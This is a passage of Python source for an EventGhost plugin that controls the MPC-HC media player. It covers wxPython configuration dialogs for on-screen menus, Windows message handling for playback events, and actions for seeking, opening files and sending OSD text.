foreSelLbl=wx.StaticText(panel, -1, self.text.txtColourSel+':')\n foreSelColourButton = eg.ColourSelectButton(panel,foreSel, title = self.text.txtColourSel)\n #Button Selected Background Colour\n backSelLbl=wx.StaticText(panel, -1, self.text.backgroundSel+':')\n backSelColourButton = eg.ColourSelectButton(panel,backSel, title = self.text.backgroundSel)\n #Button Dialog \"Menu control - assignement of events\"\n dialogButton = wx.Button(panel,-1,self.text.dialog, size = (w, -1))\n dialogButton.SetToolTipString(self.text.btnToolTip)\n foreSelLbl.Enable(not inverted)\n foreSelColourButton.Enable(not inverted)\n backSelLbl.Enable(not inverted)\n backSelColourButton.Enable(not inverted)\n #Use inverted colours checkbox\n useInvertedCtrl = wx.CheckBox(panel, -1, self.text.inverted)\n useInvertedCtrl.SetValue(inverted)\n #Sizers\n mainSizer = panel.sizer\n topSizer=wx.GridBagSizer(2, 30)\n mainSizer.Add(topSizer)\n topSizer.Add(previewLbl,(0, 0),flag = wx.TOP,border = 0)\n topSizer.Add((160,-1),(1, 0),(3, 1),flag = wx.EXPAND)\n topSizer.Add(foreLbl,(0, 1),flag = wx.TOP,border = 0)\n topSizer.Add(foreColourButton,(1, 1),flag = wx.TOP)\n topSizer.Add(backLbl,(2, 1),flag = wx.TOP,border = 8)\n topSizer.Add(backColourButton,(3, 1),flag = wx.TOP)\n topSizer.Add(foreSelLbl,(4, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(foreSelColourButton, (5, 1), flag = wx.TOP)\n topSizer.Add(backSelLbl,(6, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(backSelColourButton, (7, 1), flag = wx.TOP)\n topSizer.Add(useInvertedCtrl, (8, 1))\n topSizer.Add(OSElbl,(0, 2), flag = wx.TOP)\n topSizer.Add(displayChoice,(1, 2),flag = wx.TOP)\n topSizer.Add(dialogButton, (3, 2), flag = wx.TOP)\n #Font face\n fw = FixedWidth()\n fw.EnumerateFacenames(wx.FONTENCODING_SYSTEM, fixedWidthOnly = True)\n fw.fontList.sort()\n fontFaceLbl=wx.StaticText(panel, -1, self.text.fontFace+':')\n topSizer.Add(fontFaceLbl,(4, 0),(1, 1), flag = wx.TOP,border = 8)\n fontFaceCtrl = wx.Choice(panel, -1, choices = fw.fontList, size =(160,-1))\n fontFaceCtrl.SetStringSelection(faceFont)\n topSizer.Add(fontFaceCtrl,(5, 0),(1, 1), flag = wx.TOP)\n #Font size\n fontSizeLbl=wx.StaticText(panel, -1, self.text.fontSize+':')\n topSizer.Add(fontSizeLbl,(6, 0),(1, 1), flag = wx.TOP,border = 8)\n\n def LevelCallback(value):\n if value != sizeFont:\n panel.SetIsDirty()\n return str(value)\n\n fontSizeCtrl = eg.Slider(\n panel,\n value = sizeFont,\n min=20,\n max=120,\n style = wx.SL_TOP,\n size=(160,-1),\n levelCallback=LevelCallback\n )\n fontSizeCtrl.SetMinSize((160, -1))\n topSizer.Add(fontSizeCtrl,(7, 0),(1, 1), flag = wx.TOP)\n panel.sizer.Layout()\n spacer = topSizer.GetChildren()[1]\n ps = spacer.GetPosition()\n sz = spacer.GetSize()\n previewPanel = wx.Panel(panel, -1, pos = (ps[0], ps[1]+2), size = sz, style = wx.BORDER_SIMPLE)\n gotoLbl=wx.StaticText(previewPanel, -1, self.text.gotoLabel, pos = (5,5))\n gotoLbl.SetBackgroundColour(self.back)\n gotoLbl.SetForegroundColour(self.fore)\n gt = gotoLbl.GetTextExtent(self.text.gotoLabel)\n fnt = gotoLbl.GetFont()\n fnt.SetPointSize(12)\n fnt.SetWeight(wx.FONTWEIGHT_BOLD)\n gotoLbl.SetFont(fnt)\n GoToCtrl = wx.TextCtrl(\n previewPanel,\n -1,\n style=wx.TE_RICH2|wx.NO_BORDER|wx.TE_READONLY|wx.TE_CENTER,\n )\n GoToCtrl.SetValue(\"01:25:30\")\n fnt.SetPointSize(20)\n GoToCtrl.SetFont(fnt)\n previewPanel.SetBackgroundColour(self.back)\n GoToCtrl.SetBackgroundColour(self.back)\n\n def OnFontFaceChoice(event = None):\n fnt.SetFaceName(fontFaceCtrl.GetStringSelection())\n GoToCtrl.SetFont(fnt)\n if GoToCtrl.GetTextExtent(\"01:25:30\")[0] < 120:\n self.sizeFlag = True\n else:\n self.sizeFlag = False\n te = GoToCtrl.GetTextExtent(\"01:25:30\")\n GoToCtrl.SetSize((158, te[1]))\n GoToCtrl.SetPosition((1, 5+gt[1]+(sz[1]-gt[1]-te[1])/2))\n pos = 3\n GoToCtrl.SetStyle(0, pos, wx.TextAttr(self.fore, self.back, fnt))\n GoToCtrl.SetStyle(pos, pos+1, wx.TextAttr(self.foreSel, self.backSel, fnt))\n GoToCtrl.SetStyle(pos+1, 8, wx.TextAttr(self.fore, self.back, fnt))\n if event:\n event.Skip()\n fontFaceCtrl.Bind(wx.EVT_CHOICE, OnFontFaceChoice)\n OnFontFaceChoice()\n\n\n def OnInverted(evt):\n flag = evt.IsChecked()\n foreSelLbl.Enable(not flag)\n foreSelColourButton.Enable(not flag)\n backSelLbl.Enable(not flag)\n backSelColourButton.Enable(not flag)\n self.inverted = flag\n if flag:\n backSelColourButton.SetValue(foreColourButton.GetValue())\n foreSelColourButton.SetValue(backColourButton.GetValue())\n self.backSel = self.fore\n self.foreSel = self.back\n previewPanel.Refresh()\n OnFontFaceChoice()\n evt.Skip\n useInvertedCtrl.Bind(wx.EVT_CHECKBOX, OnInverted)\n\n\n def OnDialogBtn(evt):\n dlg = MenuEventsDialog(\n parent = panel,\n plugin = self.plugin,\n )\n dlg.Centre()\n wx.CallAfter(dlg.ShowMenuEventsDialog, self.text.evtAssignTitle, self.text.events)\n evt.Skip()\n dialogButton.Bind(wx.EVT_BUTTON, OnDialogBtn)\n\n\n def OnColourBtn(evt):\n id = evt.GetId()\n value = evt.GetValue()\n if id == foreColourButton.GetId():\n self.fore = value\n gotoLbl.SetForegroundColour(value)\n if self.inverted:\n self.backSel = value\n backSelColourButton.SetValue(value)\n elif id == backColourButton.GetId():\n self.back = value\n GoToCtrl.SetBackgroundColour(value)\n previewPanel.SetBackgroundColour(value)\n gotoLbl.SetBackgroundColour(value)\n if self.inverted:\n self.foreSel = value\n foreSelColourButton.SetValue(value)\n elif id == foreSelColourButton.GetId():\n self.foreSel = value\n elif id == backSelColourButton.GetId():\n self.backSel = value\n previewPanel.Refresh()\n OnFontFaceChoice()\n evt.Skip()\n foreColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n foreSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n\n def setFocus():\n pass\n panel.setFocus = setFocus\n\n # re-assign the test button\n def OnButton(event):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = GoToFrame()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowGoToFrame,\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n fontFaceCtrl.GetStringSelection(),\n fontSizeCtrl.GetValue(),\n True,\n self.plugin,\n self.event,\n displayChoice.GetSelection(),\n self.plugin.mpcHwnd,\n panel.evtList,\n self.sizeFlag\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n self.PrintError(eg.Classes.Exceptions.Text.ProgramNotRunning)\n panel.dialog.buttonRow.testButton.Bind(wx.EVT_BUTTON, OnButton)\n\n while panel.Affirmed():\n panel.SetResult(\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n fontFaceCtrl.GetStringSelection(),\n fontSizeCtrl.GetValue(),\n displayChoice.GetSelection(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n panel.evtList,\n self.sizeFlag,\n useInvertedCtrl.GetValue()\n )\n#===============================================================================\n\nclass ShowMenu(eg.ActionClass):\n\n name = \"Show MPC menu\"\n description = \"Show MPC menu.\"\n panel = None\n\n class text:\n OSELabel = 'Menu show on:'\n menuPreview = 'MPC On Screen Menu preview:'\n menuFont = 'Font:'\n txtColour = 'Text colour'\n background = 'Background colour'\n txtColourSel = 'Selected text colour'\n backgroundSel = 'Selected background colour'\n dialog = \"Events ...\"\n btnToolTip = \"\"\"Press this button to assign events to control the menu !!!\"\"\"\n evtAssignTitle = \"Menu control - events assignement\"\n events = (\n \"Cursor up:\",\n \"Cursor down:\",\n \"Back from the (sub)menu:\",\n \"Submenu, or select an item:\",\n \"Cancel (Escape):\",\n )\n inverted = \"Use inverted colours\"\n\n\n def __call__(\n self,\n fore,\n back,\n fontInfo = arialInfoString,\n monitor = 0,\n foreSel = (180, 180, 180),\n backSel = (75, 75, 75),\n evtList = [],\n inverted = True\n ):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = Menu()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowMenu,\n fore,\n back,\n foreSel,\n backSel,\n fontInfo,\n False,\n self.plugin,\n self.event,\n monitor,\n self.plugin.mpcHwnd,\n evtList,\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n eg.programCounter = None\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(\n self,\n fore,\n back,\n fontInfo,\n monitor,\n foreSel,\n backSel,\n evtList,\n inverted\n ):\n return self.name\n\n\n def Configure(\n self,\n fore = (75, 75, 75),\n back = (180, 180, 180),\n fontInfo = arialInfoString,\n monitor = 0,\n foreSel = (180, 180, 180),\n backSel = (75, 75, 75),\n evtList = [[],[],[],[],[]],\n inverted = True\n ):\n self.fontInfo = fontInfo\n self.fore = fore\n self.back = back\n self.foreSel = foreSel\n self.backSel = backSel\n self.oldSel=0\n self.inverted = inverted\n global panel\n panel = eg.ConfigPanel(self)\n panel.evtList = cpy(evtList)\n previewLbl=wx.StaticText(panel, -1, self.text.menuPreview)\n listBoxCtrl = MenuGrid(panel, 3)\n items = ((\"Blabla_1\",0,True,804),\n (\"Blabla_2\",1,False,804),\n (\"Blabla_3\",2,False,-1),)\n listBoxCtrl.Set(items)\n listBoxCtrl.SetBackgroundColour(self.back)\n listBoxCtrl.SetForegroundColour(self.fore)\n listBoxCtrl.SetSelectionBackground(self.backSel)\n listBoxCtrl.SetSelectionForeground(self.foreSel)\n #Font button\n fontLbl=wx.StaticText(panel, -1, self.text.menuFont)\n fontButton = eg.FontSelectButton(panel, value = fontInfo)\n font = wx.FontFromNativeInfoString(fontInfo)\n for n in range(10,20):\n font.SetPointSize(n)\n fontButton.SetFont(font)\n hght = fontButton.GetTextExtent('X')[1]\n if hght > 20:\n break\n listBoxCtrl.SetDefaultCellFont(font)\n arial = wx.FontFromNativeInfoString(arialInfoString)\n fontButton.SetFont(font)\n for n in range(1,1000):\n arial.SetPointSize(n)\n fontButton.SetFont(arial)\n h = fontButton.GetTextExtent(u\"\\u25a0\")[1]\n if h > hght:\n break\n arial.SetPointSize(2*n/3)\n fontButton.SetFont(arial)\n w0 = 2 * fontButton.GetTextExtent(u\"\\u25a0\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)\n listBoxCtrl.SetColAttr(0,attr)\n for n in range(1,1000):\n arial.SetPointSize(n)\n fontButton.SetFont(arial)\n h = fontButton.GetTextExtent(u\"\\u25ba\")[1]\n if h > hght:\n break\n arial.SetPointSize(n/2)\n fontButton.SetFont(arial)\n w2 = 2 * fontButton.GetTextExtent(u\"\\u25ba\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)\n listBoxCtrl.SetColAttr(2,attr)\n listBoxCtrl.SetDefaultRowSize(hght+4, True)\n displayChoice = eg.DisplayChoice(panel, monitor)\n w = displayChoice.GetSize()[0]\n OSElbl = wx.StaticText(panel, -1, self.text.OSELabel)\n useInvertedCtrl = wx.CheckBox(panel, -1, self.text.inverted)\n useInvertedCtrl.SetValue(inverted)\n #Button Text Colour\n foreLbl=wx.StaticText(panel, -1, self.text.txtColour+':')\n foreColourButton = eg.ColourSelectButton(panel,fore,title = self.text.txtColour)\n #Button Background Colour\n backLbl=wx.StaticText(panel, -1, self.text.background+':')\n backColourButton = eg.ColourSelectButton(panel,back,title = self.text.background)\n #Button Selected Text Colour\n foreSelLbl=wx.StaticText(panel, -1, self.text.txtColourSel+':')\n foreSelColourButton = eg.ColourSelectButton(panel,foreSel,title = self.text.txtColourSel)\n #Button Selected Background Colour\n backSelLbl=wx.StaticText(panel, -1, self.text.backgroundSel+':')\n backSelColourButton = eg.ColourSelectButton(panel,backSel,title = self.text.backgroundSel)\n #Button Dialog \"Menu control - assignement of events\"\n dialogButton = wx.Button(panel,-1,self.text.dialog)\n dialogButton.SetToolTipString(self.text.btnToolTip)\n foreSelLbl.Enable(not inverted)\n foreSelColourButton.Enable(not inverted)\n backSelLbl.Enable(not inverted)\n backSelColourButton.Enable(not inverted)\n #Sizers\n mainSizer = panel.sizer\n topSizer=wx.GridBagSizer(2, 30)\n mainSizer.Add(topSizer)\n topSizer.Add(previewLbl,(0, 0),flag = wx.TOP,border = 0)\n topSizer.Add(listBoxCtrl,(1, 0),(4, 1))\n topSizer.Add(useInvertedCtrl,(6, 0),flag = wx.TOP, border = 8)\n topSizer.Add(fontLbl,(0, 1),flag = wx.TOP)\n topSizer.Add(fontButton,(1, 1),flag = wx.TOP)\n topSizer.Add(foreLbl,(2, 1),flag = wx.TOP,border = 8)\n topSizer.Add(foreColourButton,(3, 1),flag = wx.TOP)\n topSizer.Add(backLbl,(4, 1),flag = wx.TOP,border = 8)\n topSizer.Add(backColourButton,(5, 1),flag = wx.TOP)\n topSizer.Add(OSElbl,(0, 2), flag = wx.TOP)\n topSizer.Add(displayChoice,(1, 2),flag = wx.TOP)\n topSizer.Add(foreSelLbl,(6, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(foreSelColourButton, (7, 1), flag = wx.TOP)\n topSizer.Add(backSelLbl,(8, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(backSelColourButton, (9, 1), flag = wx.TOP)\n topSizer.Add(dialogButton, (3, 2), flag = wx.TOP|wx.EXPAND)\n panel.sizer.Layout()\n wdth = 160\n if (hght+4)*listBoxCtrl.GetNumberRows() > listBoxCtrl.GetSize()[1]: #after Layout() !!!\n wdth -= SYS_VSCROLL_X\n listBoxCtrl.SetColSize(0, w0)\n listBoxCtrl.SetColSize(1, wdth - w0 - w2)\n listBoxCtrl.SetColSize(2, w2)\n listBoxCtrl.SetGridCursor(-1, 1)\n listBoxCtrl.SelectRow(0)\n\n\n def OnMonitor(evt):\n listBoxCtrl.SetFocus()\n evt.Skip\n displayChoice.Bind(wx.EVT_CHOICE, OnMonitor)\n\n\n def OnInverted(evt):\n flag = evt.IsChecked()\n foreSelLbl.Enable(not flag)\n foreSelColourButton.Enable(not flag)\n backSelLbl.Enable(not flag)\n backSelColourButton.Enable(not flag)\n self.inverted = flag\n if flag:\n self.foreSel = self.back\n self.backSel = self.fore\n backSelColourButton.SetValue(self.backSel)\n foreSelColourButton.SetValue(self.foreSel)\n listBoxCtrl.SetSelectionForeground(self.foreSel)\n listBoxCtrl.SetSelectionBackground(self.backSel)\n listBoxCtrl.SetFocus()\n evt.Skip\n useInvertedCtrl.Bind(wx.EVT_CHECKBOX, OnInverted)\n\n\n def OnDialogBtn(evt):\n dlg = MenuEventsDialog(\n parent = panel,\n plugin = self.plugin,\n )\n dlg.Centre()\n wx.CallAfter(dlg.ShowMenuEventsDialog, self.text.evtAssignTitle, self.text.events)\n evt.Skip()\n dialogButton.Bind(wx.EVT_BUTTON, OnDialogBtn)\n\n\n def OnFontBtn(evt):\n value = evt.GetValue()\n self.fontInfo = value\n font = wx.FontFromNativeInfoString(value)\n for n in range(10,20):\n font.SetPointSize(n)\n fontButton.SetFont(font)\n hght = fontButton.GetTextExtent('X')[1]\n if hght > 20:\n break\n listBoxCtrl.SetDefaultCellFont(font)\n listBoxCtrl.SetDefaultRowSize(hght+4, True)\n for i in range(listBoxCtrl.GetNumberRows()):\n listBoxCtrl.SetCellFont(i,1,font)\n listBoxCtrl.SetFocus()\n if evt:\n evt.Skip()\n fontButton.Bind(eg.EVT_VALUE_CHANGED, OnFontBtn)\n\n def OnColourBtn(evt):\n id = evt.GetId()\n value = evt.GetValue()\n if id == foreColourButton.GetId():\n listBoxCtrl.SetForegroundColour(value)\n if self.inverted:\n self.backSel = self.fore\n listBoxCtrl.SetSelectionBackground(value)\n backSelColourButton.SetValue(value)\n elif id == backColourButton.GetId():\n listBoxCtrl.SetBackgroundColour(value)\n if self.inverted:\n self.foreSel = self.back\n listBoxCtrl.SetSelectionForeground(value)\n foreSelColourButton.SetValue(value)\n elif id == foreSelColourButton.GetId():\n listBoxCtrl.SetSelectionForeground(value)\n elif id == backSelColourButton.GetId():\n listBoxCtrl.SetSelectionBackground(value)\n listBoxCtrl.Refresh()\n listBoxCtrl.SetFocus()\n evt.Skip()\n foreColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n foreSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n\n\n def setFocus():\n listBoxCtrl.SetFocus()\n panel.setFocus = setFocus\n\n # re-assign the test button\n def OnButton(event):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = Menu()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowMenu,\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n self.fontInfo,\n True,\n self.plugin,\n self.event,\n displayChoice.GetSelection(),\n self.plugin.mpcHwnd,\n panel.evtList\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n self.PrintError(eg.Classes.Exceptions.Text.ProgramNotRunning)\n panel.dialog.buttonRow.testButton.Bind(wx.EVT_BUTTON, OnButton)\n\n while panel.Affirmed():\n fontInfo = fontButton.GetValue()\n if not fontInfo:\n font = listBoxCtrl.GetFont()\n font.SetPointSize(36)\n fontInfo = font.GetNativeFontInfoDesc()\n panel.SetResult(\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n fontInfo,\n displayChoice.GetSelection(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n panel.evtList,\n useInvertedCtrl.GetValue()\n )\n#===============================================================================\nclass Run(eg.ActionBase):\n\n def __call__(self):\n if self.plugin.mpcPath:\n self.plugin.ConnectMpcHc()\n#===============================================================================\n\nclass MediaPlayerClassic(eg.PluginBase):\n\n mySched = None\n myStart = None\n menuDlg = None\n state = None\n playstate = 3\n np_payload = None\n mpcHwnd = None\n event = None\n result = None\n runFlg = False\n strtFlg = False\n connected = False\n\n class text:\n popup = (\n \"Delete item\",\n \"Delete all items\",\n )\n cancel = 'Cancel'\n ok = 'OK'\n clear = \"Clear all\"\n toolTip = \"Drag-and-drop an event from the log into the box.\"\n opened = \"Opened\"\n closed = \"Closed\"\n label = \"Path to MPC-HC executable:\"\n fileMask = \"MPC-HC executable|mpc-hc*.exe|All EXE files (*.exe)|*.exe\"\n gotoLabel = \"Go To...\"\n fltr='\"NowPlaying\" event is only trigerred when the payload is changed'\n\n def ParseMsg(self, msg):\n msg = msg.replace(u\"\\\\|\", u\"\\xb0*\\u2734*\\xb0\")\n msg = msg.split(u\"|\")\n for i in range(len(msg)):\n msg[i] = msg[i].replace(u\"\\xb0*\\u2734*\\xb0\", u\"|\")\n return msg\n\n\n @eg.LogIt\n def Handler(self, hwnd, mesg, wParam, lParam):\n if not self.runFlg:\n return True\n cpyData = cast(lParam, PCOPYDATASTRUCT)\n cmd = cpyData.contents.dwData\n msg = wstring_at(cpyData.contents.lpData)\n if cmd == CMD_CONNECT:\n self.mpcHwnd = int(msg)\n self.connected = True\n eg.TriggerEvent(\"Connected\",prefix=\"MPC-HC\")\n elif cmd == CMD_STATE:\n state = int(msg)\n if self.state != state:\n self.state = state\n eg.TriggerEvent(\"State.\"+MPC_LOADSTATE[state],prefix=\"MPC-HC\")\n elif cmd == CMD_NOWPLAYING:\n if self.playstate == 3: # if the plugin is started when the MPC-HC is already playing\n self.playstate = 0\n msg = self.ParseMsg(msg)\n if msg != self.np_payload:\n self.np_payload = msg\n eg.TriggerEvent(\"NowPlaying\",prefix=\"MPC-HC\", payload = msg)\n\n elif cmd == CMD_PLAYMODE:\n self.playstate = int(msg)\n eg.TriggerEvent(\"Playstate.\"+MPC_PLAYSTATE[self.playstate],prefix=\"MPC-HC\")\n\n elif cmd == CMD_NOTIFYSEEK:\n eg.TriggerEvent(\"Seek\",prefix=\"MPC-HC\",payload = int(0.5+float(msg)))\n\n elif cmd in (\n CMD_CURRENTPOSITION,\n CMD_LISTSUBTITLETRACKS,\n CMD_LISTAUDIOTRACKS,\n CMD_PLAYLIST\n ):\n if self.event:\n self.result = self.ParseMsg(msg)\n SetEvent(self.event)\n\n elif cmd == CMD_NOTIFYENDOFSTREAM:\n eg.TriggerEvent(\"EndOfStream\",prefix=\"MPC-HC\")\n return True\n\n\n def ConnectMpcHc(self):\n if not self.runFlg:\n mp = self.mpcPath\n mp = mp.encode(FSE) if isinstance(mp, unicode) else mp\n if isfile(mp):\n self.runFlg = True\n self.strtFlg = False\n args = [mp]\n args.append(\"/slave\")\n args.append(str(self.mr.hwnd))\n Popen(args)\n\n\n def isResponding(self, hwnd):\n try:\n SendMessageTimeout(hwnd, 0, timeout = 1000) # 0 = WM_NULL\n return True\n except:\n return False\n\n\n def isRunning(self):\n try:\n return FindWindow(u'MediaPlayerClassicW', None)\n except:\n return False\n\n\n def waitBeforeConnect(self):\n hwnd = self.isRunning()\n if hwnd:\n if self.isResponding(hwnd):\n eg.scheduler.AddTask(1, self.ConnectMpcHc)\n else:\n self.myStart = eg.scheduler.AddTask(2, self.waitBeforeConnect)\n else:\n self.strtFlg = False\n\n\n def mpcIsRunning(self):\n self.mySched=eg.scheduler.AddTask(2, self.mpcIsRunning) # must run continuously !\n if not self.isRunning(): #user closed MPC-HC ?\n if self.runFlg and self.connected:\n self.runFlg = False\n self.connected = False\n self.strtFlg = False\n self.myStart = None\n self.mpcHwnd = None\n elif self.runFlg:\n pass\n elif not self.strtFlg:\n self.strtFlg = True\n self.myStart = eg.scheduler.AddTask(2, self.waitBeforeConnect)\n\n\n def SendCopydata(self, cmd, txt):\n if self.mpcHwnd is not None:\n cpyData = create_unicode_buffer(txt)\n cds = COPYDATASTRUCT()\n cds.dwData = cmd\n cds.lpData = cast(cpyData, c_void_p)\n cds.cbData = sizeof(cpyData)\n return SendMessage(self.mpcHwnd, WM_COPYDATA, 0, addressof(cds))\n\n\n def __init__(self):\n self.mr = eg.MessageReceiver(\"MPC-HC_plugin_\")\n self.mr.AddHandler(WM_COPYDATA, self.Handler)\n self.mr.Start()\n self.AddActionsFromList(ACTIONS, ActionPrototype)\n\n\n def __start__(self, mpcPath=None, fltr=True):\n self.fltr=fltr\n self.mySched=None\n self.myStart=None\n self.menuDlg = None\n self.state = None\n self.mpcHwnd = None\n self.event = None\n self.result = None\n self.runFlg = False\n self.strtFlg = False\n self.connected = False\n self.playstate = 3\n self.np_payload = None\n if mpcPath is None:\n mpcPath = self.GetMpcHcPath()\n if not mpcPath or not exists(mpcPath):\n raise self.Exceptions.ProgramNotFound\n return\n self.mpcPath = mpcPath\n hWnd = Find_MPC()\n if hWnd:\n self.mpcHwnd = hWnd[0]\n eg.scheduler.AddTask(1, self.mpcIsRunning)\n\n\n def __stop__(self):\n if self.mySched:\n try:\n eg.scheduler.CancelTask(self.mySched)\n except:\n pass\n if self.myStart:\n try:\n eg.scheduler.CancelTask(self.myStart)\n except:\n pass\n\n\n def __close__(self):\n self.mr.RemoveHandler(WM_COPYDATA, self.Handler)\n self.mr.Stop()\n self.mr = None\n\n\n def Configure(self, mpcPath=None,fltr=True):\n if mpcPath is None:\n mpcPath = self.GetMpcHcPath()\n if mpcPath is None:\n mpcPath = join(\n eg.folderPath.ProgramFiles,\n \"MediaPlayerClassic\",\n \"mpc-hc.exe\"\n )\n panel = eg.ConfigPanel()\n filepathCtrl = eg.FileBrowseButton(\n panel,\n size=(320,-1),\n initialValue=mpcPath,\n startDirectory=eg.folderPath.ProgramFiles,\n labelText=\"\",\n fileMask = self.text.fileMask,\n buttonText=eg.text.General.browse,\n )\n fltrCtrl = wx.CheckBox(panel, -1, self.text.fltr)\n fltrCtrl.SetValue(fltr)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(wx.StaticText(panel,-1,self.text.label))\n sizer.Add(filepathCtrl)\n sizer.Add(fltrCtrl,0,wx.TOP,20)\n panel.sizer.Add(sizer,0,wx.ALL,10)\n while panel.Affirmed():\n panel.SetResult(\n filepathCtrl.GetValue(),\n fltrCtrl.GetValue()\n )\n\n\n def GetMpcHcPath(self):\n \"\"\"\n Get the path of MPC-HC's installation directory through querying\n the Windows registry.\n \"\"\"\n try:\n if \"PROCESSOR_ARCHITEW6432\" in environ:\n args = [_winreg.HKEY_CURRENT_USER,\n \"Software\\MPC-HC\\MPC-HC\"]\n args.extend((0, _winreg.KEY_READ | _winreg.KEY_WOW64_64KEY))\n else:\n args = [_winreg.HKEY_CURRENT_USER,\n \"Software\\Gabest\\Media Player Classic\"]\n mpc = _winreg.OpenKey(*args)\n mpcPath =_winreg.QueryValueEx(mpc, \"ExePath\")[0]\n _winreg.CloseKey(mpc)\n except WindowsError:\n mpcPath = None\n return mpcPath\n\n\n def GetWindowState(self):\n hWnd = Find_MPC()\n if not hWnd:\n return -1\n else:\n hWnd = hWnd[0]\n if not IsWindowVisible(hWnd):\n return 0\n state = GetWindowPlacement(hWnd)[1]\n border = GetWindowLong(hWnd, GWL_EXSTYLE) & WS_EX_WINDOWEDGE\n if border:\n return state\n rect = GetWindowRect(hWnd)\n mons = EnumDisplayMonitors()\n fullscreen = False\n for mon in mons:\n if rect == mon[2]:\n fullscreen = True\n break\n if fullscreen:\n return 4\n return state\n#===============================================================================\n\nclass SendCmd(eg.ActionBase):\n def __call__(self):\n self.plugin.SendCopydata(self.value, u\"\")\n#===============================================================================\n\nclass GetInfo(eg.ActionBase):\n def __call__(self):\n self.plugin.result = None\n self.plugin.event = CreateEvent(None, 0, 0, None)\n if self.plugin.SendCopydata(self.value, u\"\"):\n eg.actionThread.WaitOnEvent(self.plugin.event)\n self.plugin.event = None\n if self.plugin.result:\n return self.plugin.result\n#===============================================================================\n\nclass OpenFile(eg.ActionBase):\n\n class text:\n toolTipFile = 'Type filename or click browse to choose file'\n browseFile = 'Choose a file'\n\n\n def __call__(self, filepath = \"\"):\n if filepath:\n filepath = eg.ParseString(filepath)\n self.plugin.SendCopydata(self.value, filepath)\n\n\n def Configure(self, filepath = \"\"):\n panel = eg.ConfigPanel()\n folder = split(filepath)[0] if filepath else eg.folderPath.Videos\n filepathLabel = wx.StaticText(panel, -1, \"%s:\" % self.text.browseFile)\n filepathCtrl = eg.FileBrowseButton(\n panel,\n -1,\n toolTip = self.text.toolTipFile,\n dialogTitle = self.text.browseFile,\n buttonText = eg.text.General.browse,\n startDirectory = folder,\n initialValue = filepath\n )\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(filepathLabel,0,wx.TOP,3)\n sizer.Add(filepathCtrl,1,wx.LEFT|wx.EXPAND,5)\n panel.sizer.Add(sizer,0,wx.ALL|wx.EXPAND,20)\n while panel.Affirmed():\n panel.SetResult(\n filepathCtrl.GetValue(),\n )\n#===============================================================================\n\nclass GetPosition(eg.ActionBase):\n\n def __call__(self):\n self.plugin.result = None\n self.plugin.event = CreateEvent(None, 0, 0, None)\n if self.plugin.SendCopydata(CMD_GETCURRENTPOSITION, u\"\"):\n eg.actionThread.WaitOnEvent(self.plugin.event)\n self.plugin.event = None\n if self.plugin.result:\n return int(0.5+float(self.plugin.result[0]))\n#===============================================================================\n\nclass SetInteger(eg.ActionBase):\n\n class text:\n labels = (\n (\"Jump of\", \"seconds (negative values for backward)\"),\n (\"New position:\", \"seconds\"),\n (\"Index of the audio track:\", \"\"),\n (\"Index of the subtitle track:\", \"(-1 for disabling subtitles)\"),\n (\"Index of the active file:\", \"(-1 for no file selected)\"),\n (\"New audio delay:\", \"milliseconds\"),\n (\"New subtitle delay:\", \"milliseconds\"),\n )\n\n\n def __call__(self, value=0):\n value = unicode(value)\n self.plugin.SendCopydata(self.value[0], value)\n\n\n def Configure(self, value=0):\n panel = eg.ConfigPanel()\n label_1 = wx.StaticText(panel,-1,self.text.labels[self.value[1]][0])\n label_2 = wx.StaticText(panel,-1,self.text.labels[self.value[1]][1])\n valueCtrl = eg.SpinIntCtrl(panel, -1, value, max=self.value[3],min=self.value[2])\n sizer = wx.FlexGridSizer(1, 3, 5, 10)\n sizer.Add(label_1,0,wx.TOP,3)\n sizer.Add(valueCtrl)\n sizer.Add(label_2,0,wx.TOP,3)\n panel.sizer.Add(sizer,0,wx.ALL|wx.EXPAND,20)\n while panel.Affirmed():\n panel.SetResult(\n valueCtrl.GetValue(),\n )\n#===============================================================================\n\nclass SendOSD(eg.ActionBase):\n\n class text:\n osdLabel = \"OSD text:\"\n durLabel = \"Duration [s]:\"\n posLabel = \"Position:\"\n position = (\n \"None 